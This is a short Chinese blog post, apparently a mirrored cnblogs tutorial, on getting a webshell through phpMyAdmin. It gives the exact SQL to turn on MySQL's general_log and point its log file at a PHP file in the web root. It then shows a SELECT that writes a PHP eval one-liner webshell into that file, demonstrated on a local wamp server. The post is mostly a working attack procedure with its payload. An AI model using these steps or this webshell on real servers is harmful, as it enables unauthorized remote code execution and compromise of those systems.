zoukankan      html  css  js  c++  java
  • 通过 phpmyadmin getshell

    通过 phpmyadmin  getshell

    general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

    可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shell

    进入phpmyadmin后在SQL处执行SQL语句

    首先查看general log是否开启

    show variables like 'general_log';
    

     

    general log是关闭状态,执行SQL语句开启general log

    SET GLOBAL general_log = ON

    开启成功

    然后把general_log_file设置为shell的绝对路径

    SET global general_log_file='D:/wamp/www/orange.php';
    

     

    看下刚刚创建的orange.php里的内容

    然后执行SQL查询语句,写个一句话进去。

    SELECT '<?php @eval($_POST["orange"]);?>';
    

    现在再看下orange.php里面的内容

    成功插入了一句话木马

    一句话链接在根目录(http://127.0.0.1/orange.php)

    至此结束!

    任重而道远!

  • 相关阅读:
    JSOI2010 满汉全席
    LNOI2014 LCA
    BZOJ3689 异或之
    Codeforces Round #553 div.2
    AHOI2013 差异
    SDOI2016 生成魔咒
    NOI2006 最大获利
    没有过的题QAQ
    NOI2014 动物园
    HDU4622 Reincarnation
  • 原文地址:https://www.cnblogs.com/Oran9e/p/8873091.html
Copyright © 2011-2022 走看看